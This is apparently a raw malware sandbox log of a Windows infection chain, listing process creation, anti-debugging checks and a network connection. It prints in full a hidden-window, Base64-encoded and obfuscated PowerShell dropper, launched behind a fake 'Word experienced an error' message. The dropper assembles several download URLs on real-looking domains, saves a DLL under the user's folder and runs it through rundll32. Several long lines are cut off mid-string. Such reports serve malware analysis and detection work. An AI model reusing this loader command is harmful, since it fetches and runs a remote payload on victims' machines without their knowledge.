Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,	7_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026EEF FindFirstFileExW,	7_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,	8_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026EEF FindFirstFileExW,	8_2_10026EEF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000007.00000002.2106883805.00000000004ED000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: rundll32.exe, 00000007.00000002.2106883805.00000000004ED000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10001E91 Control_RunDLL,LoadLibraryA,LoadLibraryA,LoadLibraryA,_strlen,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,MessageBoxA,

7_2_10001E91

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1003B720 IsDebuggerPresent,

7_2_1003B720

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026594 mov eax, dword ptr fs:[00000030h]	7_2_10026594
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100265D7 mov eax, dword ptr fs:[00000030h]	7_2_100265D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002661A mov eax, dword ptr fs:[00000030h]	7_2_1002661A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001065E mov eax, dword ptr fs:[00000030h]	7_2_1001065E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026675 mov eax, dword ptr fs:[00000030h]	7_2_10026675
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100106EC mov ecx, dword ptr fs:[00000030h]	7_2_100106EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002673B mov eax, dword ptr fs:[00000030h]	7_2_1002673B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002677F mov eax, dword ptr fs:[00000030h]	7_2_1002677F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100267C3 mov eax, dword ptr fs:[00000030h]	7_2_100267C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100267F4 mov eax, dword ptr fs:[00000030h]	7_2_100267F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2C4FF mov eax, dword ptr fs:[00000030h]	7_2_00B2C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026594 mov eax, dword ptr fs:[00000030h]	8_2_10026594
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100265D7 mov eax, dword ptr fs:[00000030h]	8_2_100265D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002661A mov eax, dword ptr fs:[00000030h]	8_2_1002661A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1001065E mov eax, dword ptr fs:[00000030h]	8_2_1001065E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026675 mov eax, dword ptr fs:[00000030h]	8_2_10026675
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100106EC mov ecx, dword ptr fs:[00000030h]	8_2_100106EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002673B mov eax, dword ptr fs:[00000030h]	8_2_1002673B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1002677F mov eax, dword ptr fs:[00000030h]	8_2_1002677F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100267C3 mov eax, dword ptr fs:[00000030h]	8_2_100267C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100267F4 mov eax, dword ptr fs:[00000030h]	8_2_100267F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0026C4FF mov eax, dword ptr fs:[00000030h]	8_2_0026C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001BC4FF mov eax, dword ptr fs:[00000030h]	9_2_001BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024C4FF mov eax, dword ptr fs:[00000030h]	10_2_0024C4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001FC4FF mov eax, dword ptr fs:[00000030h]	11_2_001FC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_006AC4FF mov eax, dword ptr fs:[00000030h]	12_2_006AC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BC4FF mov eax, dword ptr fs:[00000030h]	13_2_001BC4FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_0016C4FF mov eax, dword ptr fs:[00000030h]	14_2_0016C4FF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000288D GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualAlloc,und_memcpy,SetLastError,SetLastError,

7_2_1000288D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10003EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004076 SetUnhandledExceptionFilter,	7_2_10004076
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_1000E144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10004171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10003EE0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_10003EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004076 SetUnhandledExceptionFilter,	8_2_10004076
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_1000E144 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_1000E144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10004171 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_10004171

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 152.170.79.100 80

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $69mDT7 = [tyPE]("{1}{3}{0}{2}"-f'R','S','Y','YStEM.IO.diREcTO') ; $y10I = [TypE]("{6}{3}{2}{7}{4}{1}{5}{8}{0}"-f 'aGeR','t.','E','YSt','NE','sERviC','s','m.','ePointman');$ErrorActionPreference = (('Si'+'lently')+('Co'+'n')+'t'+('in'+'u')+'e');$Py0ebji=$K12O + [char](64) + $P65Z;$X92C=(('U'+'_8')+'R'); $69Mdt7::"Cr`eaT`EdIRECto`RY"($HOME + (('Z'+('M'+'PYgy'+'h')+('lqtZ'+'M')+'PB'+('x'+'5j')+'f'+('moZM'+'P'))-ReplacE([ChaR]90+[ChaR]77+[ChaR]80),[ChaR]92));$G77G=('X8'+'0P'); $y10I::"SeCurIt`yprO`TO`coL" = (('Tl'+'s')+'12');$J34J=(('Z2'+'8')+'N');$Ri62sok = ('R4'+'3H');$T9_I=('H5'+'8L');$Bhnwe92=$HOME+(('Mo'+('QYg'+'y')+('hlqtMoQ'+'B'+'x')+('5jfm'+'oM'+'oQ'))."r`EPl`ACe"(('Mo'+'Q'),[STRiNG][CHAr]92))+$Ri62sok+(('.'+'dl')+'l');$W50V=('Y'+('79'+'Y'));$Og_43_m=(']'+('b2[s:'+'/'+'/all')+('ca'+'nnabi'+'sme')+('d'+'s.com'+'/')+('u'+'nr')+('aid-'+'map/Z'+'Z')+('m'+'6/'+'@]b')+('2['+'s')+('://g'+'i'+'an')+'n'+('a'+'spsy'+'c')+'hi'+('c'+'stu')+('di'+'o.com')+('/'+'cgi-')+('bi'+'n/P'+'P/@'+']')+('b'+'2[s:')+'//'+('ieng'+'lish'+'abc.'+'c')+('o'+'m/')+('c'+'ow/'+'JH/@'+']b2[s:/')+'/a'+('b'+'ril')+('lof'+'u')+('rnit'+'u')+('r'+'e.c')+('om/b'+'ph'+'-'+'nclex-wy'+'g')+('q'+'4'+'/a7nB')+'f'+('hs'+'/')+'@'+']'+('b2'+'[')+('s'+'s:/'+'/et'+'k'+'inded')+('ek'+'tiflik.c'+'o')+('m/pc'+'ie-s'+'p')+'e'+('ed/'+'U/@]b2['+'ss')+('://vst'+'s'+'a')+'mp'+('le'+'.com/wp-'+'incl'+'ud'+'es'+'/'+'7eX')+('eI'+'/'+'@]b2[')+'s:'+'//'+('ezi'+'-pos.c'+'om/c'+'ategory'+'l'+'/x/'))."rEplA`ce"((']'+('b'+'2[
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $69mDT7 = [tyPE]("{1}{3}{0}{2}"-f'R','S','Y','YStEM.IO.diREcTO') ; $y10I = [TypE]("{6}{3}{2}{7}{4}{1}{5}{8}{0}"-f 'aGeR','t.','E','YSt','NE','sERviC','s','m.','ePointman');$ErrorActionPreference = (('Si'+'lently')+('Co'+'n')+'t'+('in'+'u')+'e');$Py0ebji=$K12O + [char](64) + $P65Z;$X92C=(('U'+'_8')+'R'); $69Mdt7::"Cr`eaT`EdIRECto`RY"($HOME + (('Z'+('M'+'PYgy'+'h')+('lqtZ'+'M')+'PB'+('x'+'5j')+'f'+('moZM'+'P'))-ReplacE([ChaR]90+[ChaR]77+[ChaR]80),[ChaR]92));$G77G=('X8'+'0P'); $y10I::"SeCurIt`yprO`TO`coL" = (('Tl'+'s')+'12');$J34J=(('Z2'+'8')+'N');$Ri62sok = ('R4'+'3H');$T9_I=('H5'+'8L');$Bhnwe92=$HOME+(('Mo'+('QYg'+'y')+('hlqtMoQ'+'B'+'x')+('5jfm'+'oM'+'oQ'))."r`EPl`ACe"(('Mo'+'Q'),[STRiNG][CHAr]92))+$Ri62sok+(('.'+'dl')+'l');$W50V=('Y'+('79'+'Y'));$Og_43_m=(']'+('b2[s:'+'/'+'/all')+('ca'+'nnabi'+'sme')+('d'+'s.com'+'/')+('u'+'nr')+('aid-'+'map/Z'+'Z')+('m'+'6/'+'@]b')+('2['+'s')+('://g'+'i'+'an')+'n'+('a'+'spsy'+'c')+'hi'+('c'+'stu')+('di'+'o.com')+('/'+'cgi-')+('bi'+'n/P'+'P/@'+']')+('b'+'2[s:')+'//'+('ieng'+'lish'+'abc.'+'c')+('o'+'m/')+('c'+'ow/'+'JH/@'+']b2[s:/')+'/a'+('b'+'ril')+('lof'+'u')+('rnit'+'u')+('r'+'e.c')+('om/b'+'ph'+'-'+'nclex-wy'+'g')+('q'+'4'+'/a7nB')+'f'+('hs'+'/')+'@'+']'+('b2'+'[')+('s'+'s:/'+'/et'+'k'+'inded')+('ek'+'tiflik.c'+'o')+('m/pc'+'ie-s'+'p')+'e'+('ed/'+'U/@]b2['+'ss')+('://vst'+'s'+'a')+'mp'+('le'+'.com/wp-'+'incl'+'ud'+'es'+'/'+'7eX')+('eI'+'/'+'@]b2[')+'s:'+'//'+('ezi'+'-pos.c'+'om/c'+'ategory'+'l'+'/x/'))."rEplA`ce"((']'+('b'+'2[			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZ